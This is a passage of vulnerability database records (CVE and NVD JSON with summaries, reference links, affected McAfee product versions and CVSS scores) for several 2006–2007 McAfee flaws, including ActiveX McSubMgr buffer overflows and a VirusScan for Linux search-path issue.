"url": "http://securitydot.net/xpl/exploits/vulnerabilities/articles/1659/exploit.html"
},
{
"name": "20496",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/20496"
},
{
"name": "mcafee-mcnasvc-dos(29501)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/29501"
},
{
"name": "22371",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/22371"
},
{
"name": "1750",
"refsource": "SREASON",
"url": "http://securityreason.com/securityalert/1750"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2006-5417",
"datePublished": "2006-10-20T10:00:00",
"dateReserved": "2006-10-19T00:00:00",
"dateUpdated": "2024-08-07T19:48:30.217Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2006-3961
Vulnerability from cvelistv5
Published
2006-08-01 21:00
Modified
2024-08-07 18:48
Severity ?
EPSS score ?
Summary
Buffer overflow in McSubMgr ActiveX control (mcsubmgr.dll) in McAfee Security Center 6.0.23 for Internet Security Suite 2006, Wireless Home Network Security, Personal Firewall Plus, VirusScan, Privacy Service, SpamKiller, AntiSpyware, and QuickClean allows remote user-assisted attackers to execute arbitrary commands via long string parameters, which are later used in vsprintf.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/bid/19265 | vdb-entry, x_refsource_BID | |
| http://www.eeye.com/html/research/upcoming/20060719.html | x_refsource_MISC | |
| http://securitytracker.com/id?1016614 | vdb-entry, x_refsource_SECTRACK | |
| http://www.securityfocus.com/archive/1/442495/100/100/threaded | mailing-list, x_refsource_BUGTRAQ | |
| http://www.osvdb.org/27698 | vdb-entry, x_refsource_OSVDB | |
| http://www.vupen.com/english/advisories/2006/3096 | vdb-entry, x_refsource_VUPEN | |
| http://www.eeye.com/html/research/advisories/AD2006807.html | x_refsource_MISC | |
| http://ts.mcafeehelp.com/faq3.asp?docid=407052 | x_refsource_CONFIRM | |
| http://secunia.com/advisories/21264 | third-party-advisory, x_refsource_SECUNIA | |
| http://www.kb.cert.org/vuls/id/481212 | third-party-advisory, x_refsource_CERT-VN |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T18:48:39.348Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "19265",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/19265"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.eeye.com/html/research/upcoming/20060719.html"
},
{
"name": "1016614",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://securitytracker.com/id?1016614"
},
{
"name": "20060807 [EEYEB-20060719] McAfee Subscription Manager Stack Buffer Overflow",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/442495/100/100/threaded"
},
{
"name": "27698",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://www.osvdb.org/27698"
},
{
"name": "ADV-2006-3096",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2006/3096"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.eeye.com/html/research/advisories/AD2006807.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://ts.mcafeehelp.com/faq3.asp?docid=407052"
},
{
"name": "21264",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/21264"
},
{
"name": "VU#481212",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN",
"x_transferred"
],
"url": "http://www.kb.cert.org/vuls/id/481212"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2006-07-31T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in McSubMgr ActiveX control (mcsubmgr.dll) in McAfee Security Center 6.0.23 for Internet Security Suite 2006, Wireless Home Network Security, Personal Firewall Plus, VirusScan, Privacy Service, SpamKiller, AntiSpyware, and QuickClean allows remote user-assisted attackers to execute arbitrary commands via long string parameters, which are later used in vsprintf."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-17T20:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "19265",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/19265"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.eeye.com/html/research/upcoming/20060719.html"
},
{
"name": "1016614",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://securitytracker.com/id?1016614"
},
{
"name": "20060807 [EEYEB-20060719] McAfee Subscription Manager Stack Buffer Overflow",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/442495/100/100/threaded"
},
{
"name": "27698",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://www.osvdb.org/27698"
},
{
"name": "ADV-2006-3096",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2006/3096"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.eeye.com/html/research/advisories/AD2006807.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://ts.mcafeehelp.com/faq3.asp?docid=407052"
},
{
"name": "21264",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/21264"
},
{
"name": "VU#481212",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN"
],
"url": "http://www.kb.cert.org/vuls/id/481212"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2006-3961",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Buffer overflow in McSubMgr ActiveX control (mcsubmgr.dll) in McAfee Security Center 6.0.23 for Internet Security Suite 2006, Wireless Home Network Security, Personal Firewall Plus, VirusScan, Privacy Service, SpamKiller, AntiSpyware, and QuickClean allows remote user-assisted attackers to execute arbitrary commands via long string parameters, which are later used in vsprintf."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "19265",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/19265"
},
{
"name": "http://www.eeye.com/html/research/upcoming/20060719.html",
"refsource": "MISC",
"url": "http://www.eeye.com/html/research/upcoming/20060719.html"
},
{
"name": "1016614",
"refsource": "SECTRACK",
"url": "http://securitytracker.com/id?1016614"
},
{
"name": "20060807 [EEYEB-20060719] McAfee Subscription Manager Stack Buffer Overflow",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/442495/100/100/threaded"
},
{
"name": "27698",
"refsource": "OSVDB",
"url": "http://www.osvdb.org/27698"
},
{
"name": "ADV-2006-3096",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2006/3096"
},
{
"name": "http://www.eeye.com/html/research/advisories/AD2006807.html",
"refsource": "MISC",
"url": "http://www.eeye.com/html/research/advisories/AD2006807.html"
},
{
"name": "http://ts.mcafeehelp.com/faq3.asp?docid=407052",
"refsource": "CONFIRM",
"url": "http://ts.mcafeehelp.com/faq3.asp?docid=407052"
},
{
"name": "21264",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/21264"
},
{
"name": "VU#481212",
"refsource": "CERT-VN",
"url": "http://www.kb.cert.org/vuls/id/481212"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2006-3961",
"datePublished": "2006-08-01T21:00:00",
"dateReserved": "2006-08-01T00:00:00",
"dateUpdated": "2024-08-07T18:48:39.348Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2006-6474
Vulnerability from cvelistv5
Published
2006-12-14 20:00
Modified
2024-08-07 20:26
Severity ?
EPSS score ?
Summary
Untrusted search path vulnerability in McAfee VirusScan for Linux 4510e and earlier includes the current working directory in the DT_RPATH environment variable, which allows local users to load arbitrary ELF DSO libraries and execute arbitrary code by installing malicious libraries in that directory.
References
| ▼ | URL | Tags |
|---|---|---|
| http://secunia.com/advisories/23429 | third-party-advisory, x_refsource_SECUNIA | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/30898 | vdb-entry, x_refsource_XF | |
| http://secunia.com/advisories/23278 | third-party-advisory, x_refsource_SECUNIA | |
| http://securitytracker.com/id?1017385 | vdb-entry, x_refsource_SECTRACK | |
| http://www.vupen.com/english/advisories/2006/5023 | vdb-entry, x_refsource_VUPEN | |
| http://www.securityfocus.com/bid/21592 | vdb-entry, x_refsource_BID | |
| http://security.gentoo.org/glsa/glsa-200612-15.xml | vendor-advisory, x_refsource_GENTOO |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T20:26:46.592Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "23429",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/23429"
},
{
"name": "mcafee-dtrpath-code-execution(30898)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/30898"
},
{
"name": "23278",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/23278"
},
{
"name": "1017385",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://securitytracker.com/id?1017385"
},
{
"name": "ADV-2006-5023",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2006/5023"
},
{
"name": "21592",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/21592"
},
{
"name": "GLSA-200612-15",
"tags": [
"vendor-advisory",
"x_refsource_GENTOO",
"x_transferred"
],
"url": "http://security.gentoo.org/glsa/glsa-200612-15.xml"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2006-12-14T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Untrusted search path vulnerability in McAfee VirusScan for Linux 4510e and earlier includes the current working directory in the DT_RPATH environment variable, which allows local users to load arbitrary ELF DSO libraries and execute arbitrary code by installing malicious libraries in that directory."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-07-28T12:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "23429",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/23429"
},
{
"name": "mcafee-dtrpath-code-execution(30898)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/30898"
},
{
"name": "23278",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/23278"
},
{
"name": "1017385",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://securitytracker.com/id?1017385"
},
{
"name": "ADV-2006-5023",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2006/5023"
},
{
"name": "21592",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/21592"
},
{
"name": "GLSA-200612-15",
"tags": [
"vendor-advisory",
"x_refsource_GENTOO"
],
"url": "http://security.gentoo.org/glsa/glsa-200612-15.xml"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2006-6474",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Untrusted search path vulnerability in McAfee VirusScan for Linux 4510e and earlier includes the current working directory in the DT_RPATH environment variable, which allows local users to load arbitrary ELF DSO libraries and execute arbitrary code by installing malicious libraries in that directory."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "23429",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/23429"
},
{
"name": "mcafee-dtrpath-code-execution(30898)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/30898"
},
{
"name": "23278",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/23278"
},
{
"name": "1017385",
"refsource": "SECTRACK",
"url": "http://securitytracker.com/id?1017385"
},
{
"name": "ADV-2006-5023",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2006/5023"
},
{
"name": "21592",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/21592"
},
{
"name": "GLSA-200612-15",
"refsource": "GENTOO",
"url": "http://security.gentoo.org/glsa/glsa-200612-15.xml"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2006-6474",
"datePublished": "2006-12-14T20:00:00",
"dateReserved": "2006-12-11T00:00:00",
"dateUpdated": "2024-08-07T20:26:46.592Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
Vulnerability from fkie_nvd
Published
2007-05-10 00:19
Modified
2024-11-21 00:31
Severity ?
Summary
Buffer overflow in the IsOldAppInstalled function in the McSubMgr.McSubMgr Subscription Manager ActiveX control (MCSUBMGR.DLL) in McAfee SecurityCenter before 6.0.25 and 7.x before 7.2.147 allows remote attackers to execute arbitrary code via a crafted argument.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| mcafee | security_center | 4.3 | |
| mcafee | security_center | 6.0 | |
| mcafee | security_center | 6.0.22 | |
| mcafee | security_center | 7.0 | |
| mcafee | security_center | 7.1 | |
| mcafee | security_center | 7.2 | |
| mcafee | securitycenter_agent | 6.0 | |
| mcafee | virusscan | 10.0.27 | |
| mcafee | virusscan | 2004 | |
| mcafee | virusscan | 2005 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mcafee:security_center:4.3:*:*:*:*:*:*:*",
"matchCriteriaId": "DD547C9C-9D50-49ED-8EFE-1DD7484DDED5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:security_center:6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "210F5447-4FC7-4278-9F2A-C64BBB5A86DD",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:security_center:6.0.22:*:*:*:*:*:*:*",
"matchCriteriaId": "BECBD40D-ACBD-4E88-B230-ECFE98FD9F5D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:security_center:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "8E42B079-DC23-43AC-9437-62B97C88EF3C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:security_center:7.1:*:*:*:*:*:*:*",
"matchCriteriaId": "449EAAD6-C4B6-4EC9-9059-1D447C1D60F5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:security_center:7.2:*:*:*:*:*:*:*",
"matchCriteriaId": "D27864F9-A378-4690-9C17-C3B6A55135F7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:securitycenter_agent:6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FC64577D-EFD8-4D30-B95A-D26075CFD063",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:virusscan:10.0.27:*:*:*:*:*:*:*",
"matchCriteriaId": "8CC6DF56-10C0-4682-B466-EBBC3640DCE4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:virusscan:2004:*:*:*:*:*:*:*",
"matchCriteriaId": "4D9B7B07-E3EF-4185-927C-CE308829B9A1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:virusscan:2005:*:*:*:*:*:*:*",
"matchCriteriaId": "F58D6A2F-AC08-4C1D-9ABF-4D675A1E87AC",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in the IsOldAppInstalled function in the McSubMgr.McSubMgr Subscription Manager ActiveX control (MCSUBMGR.DLL) in McAfee SecurityCenter before 6.0.25 and 7.x before 7.2.147 allows remote attackers to execute arbitrary code via a crafted argument."
},
{
"lang": "es",
"value": "Desbordamiento de b\u00fafer en la funci\u00f3n IsOldAppInstalled del control ActiveX McSubMgr.McSubMgr Subscription Manager (MCSUBMGR.DLL) en McAfee SecurityCenter anterior a 6.0.25 y 7.x anterior a 7.2.147 permite a atacantes remotos ejecutar c\u00f3digo de su elecci\u00f3n mediante un argumento manipulado."
}
],
"id": "CVE-2007-2584",
"lastModified": "2024-11-21T00:31:08.720",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"obtainAllPrivilege": true,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2007-05-10T00:19:00.000",
"references": [
{
"source": "cve@mitre.org",
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=528"
},
{
"source": "cve@mitre.org",
"url": "http://osvdb.org/35874"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/25173"
},
{
"source": "cve@mitre.org",
"url": "http://ts.mcafeehelp.com/faq3.asp?docid=419189"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/23888"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/23909"
},
{
"source": "cve@mitre.org",
"url": "http://www.securitytracker.com/id?1018028"
},
{
"source": "cve@mitre.org",
"url": "http://www.vupen.com/english/advisories/2007/1717"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34179"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=528"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://osvdb.org/35874"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/25173"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://ts.mcafeehelp.com/faq3.asp?docid=419189"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/23888"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/23909"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securitytracker.com/id?1018028"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.vupen.com/english/advisories/2007/1717"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34179"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2006-12-14 20:28
Modified
2024-11-21 00:22
Severity ?
Summary
Untrusted search path vulnerability in McAfee VirusScan for Linux 4510e and earlier includes the current working directory in the DT_RPATH environment variable, which allows local users to load arbitrary ELF DSO libraries and execute arbitrary code by installing malicious libraries in that directory.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mcafee:virusscan:*:*:linux:*:*:*:*:*",
"matchCriteriaId": "362B50AB-DB7F-4FE3-B5DD-5CBA80FA8B3D",
"versionEndIncluding": "4510e",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Untrusted search path vulnerability in McAfee VirusScan for Linux 4510e and earlier includes the current working directory in the DT_RPATH environment variable, which allows local users to load arbitrary ELF DSO libraries and execute arbitrary code by installing malicious libraries in that directory."
},
{
"lang": "es",
"value": "Vulnerabilidad de ruta de b\u00fasqueda no confiable en McAfee VirusScan para Linux 4510e y versiones anteriores, incluye el directorio de trabajo actual en la variable de entorno DT_RPATH, que permite a usuarios locales cargar bibliotecas ELF DSO de su elecci\u00f3n y ejecutar c\u00f3digo de su elecci\u00f3n instalando bibliotecas maliciosas en ese directorio."
}
],
"id": "CVE-2006-6474",
"lastModified": "2024-11-21T00:22:46.377",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": true,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2006-12-14T20:28:00.000",
"references": [
{
"source": "cve@mitre.org",
"url": "http://secunia.com/advisories/23278"
},
{
"source": "cve@mitre.org",
"url": "http://secunia.com/advisories/23429"
},
{
"source": "cve@mitre.org",
"url": "http://security.gentoo.org/glsa/glsa-200612-15.xml"
},
{
"source": "cve@mitre.org",
"url": "http://securitytracker.com/id?1017385"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/21592"
},
{
"source": "cve@mitre.org",
"url": "http://www.vupen.com/english/advisories/2006/5023"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/30898"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://secunia.com/advisories/23278"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://secunia.com/advisories/23429"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://security.gentoo.org/glsa/glsa-200612-15.xml"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://securitytracker.com/id?1017385"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/21592"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.vupen.com/english/advisories/2006/5023"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/30898"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2006-08-01 21:04
Modified
2024-11-21 00:14
Severity ?
Summary
Buffer overflow in McSubMgr ActiveX control (mcsubmgr.dll) in McAfee Security Center 6.0.23 for Internet Security Suite 2006, Wireless Home Network Security, Personal Firewall Plus, VirusScan, Privacy Service, SpamKiller, AntiSpyware, and QuickClean allows remote user-assisted attackers to execute arbitrary commands via long string parameters, which are later used in vsprintf.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| mcafee | antispyware | 2005 | |
| mcafee | antispyware | 2006 | |
| mcafee | internet_security_suite | 2004 | |
| mcafee | internet_security_suite | 2005 | |
| mcafee | internet_security_suite | 2006 | |
| mcafee | personal_firewall_plus | 2004 | |
| mcafee | personal_firewall_plus | 2005 | |
| mcafee | personal_firewall_plus | 2006 | |
| mcafee | privacy_service | 2004 | |
| mcafee | privacy_service | 2005 | |
| mcafee | privacy_service | 2006 | |
| mcafee | quickclean | 2004 | |
| mcafee | quickclean | 2005 | |
| mcafee | quickclean | 2006 | |
| mcafee | security_center | 4.3 | |
| mcafee | security_center | 6.0 | |
| mcafee | security_center | 6.0.22 | |
| mcafee | security_center | 6.0.23 | |
| mcafee | spamkiller | 5.0 | |
| mcafee | spamkiller | 6.0 | |
| mcafee | spamkiller | 7.0 | |
| mcafee | virusscan | 2004 | |
| mcafee | virusscan | 2005 | |
| mcafee | virusscan | 2006 | |
| mcafee | wireless_home_network_security | 2006 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mcafee:antispyware:2005:*:*:*:*:*:*:*",
"matchCriteriaId": "B862ADF2-A544-4729-9EE4-D140C58D6AEB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:antispyware:2006:*:*:*:*:*:*:*",
"matchCriteriaId": "5350EE37-53D7-4DFB-84FC-0FA6A7C1C123",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:internet_security_suite:2004:*:*:*:*:*:*:*",
"matchCriteriaId": "CB0A7659-25FF-4E18-B2BA-34F6FD6410F6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:internet_security_suite:2005:*:*:*:*:*:*:*",
"matchCriteriaId": "1C22BB62-9790-4D89-B1B4-D5E0F4FFB3C5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:internet_security_suite:2006:*:*:*:*:*:*:*",
"matchCriteriaId": "7E69BB96-F48B-43DA-BA7B-530E5148CCC0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:personal_firewall_plus:2004:*:*:*:*:*:*:*",
"matchCriteriaId": "1F3E0836-557F-46C8-BBDE-955D3AEBB6B3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:personal_firewall_plus:2005:*:*:*:*:*:*:*",
"matchCriteriaId": "5F62AF06-16DD-4C6C-BD48-BFA08629739C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:personal_firewall_plus:2006:*:*:*:*:*:*:*",
"matchCriteriaId": "134C4C4F-92A0-4B89-B06A-4FB8D9513AFE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:privacy_service:2004:*:*:*:*:*:*:*",
"matchCriteriaId": "0F945365-B065-44A6-8CEC-2CBCE4DD23C4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:privacy_service:2005:*:*:*:*:*:*:*",
"matchCriteriaId": "DB1AC389-8BBF-4784-ABCD-99E379AC6B75",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:privacy_service:2006:*:*:*:*:*:*:*",
"matchCriteriaId": "8E03296D-5FC1-450D-BC05-6F6E9A90CF77",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:quickclean:2004:*:*:*:*:*:*:*",
"matchCriteriaId": "931427A2-B69B-4418-8374-854A5F9420DE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:quickclean:2005:*:*:*:*:*:*:*",
"matchCriteriaId": "E19A9E38-E637-487A-BC06-F0CA6481E7EB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:quickclean:2006:*:*:*:*:*:*:*",
"matchCriteriaId": "AE3B1863-DBB3-4458-899B-CEEAD9275B17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:security_center:4.3:*:*:*:*:*:*:*",
"matchCriteriaId": "DD547C9C-9D50-49ED-8EFE-1DD7484DDED5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:security_center:6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "210F5447-4FC7-4278-9F2A-C64BBB5A86DD",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:security_center:6.0.22:*:*:*:*:*:*:*",
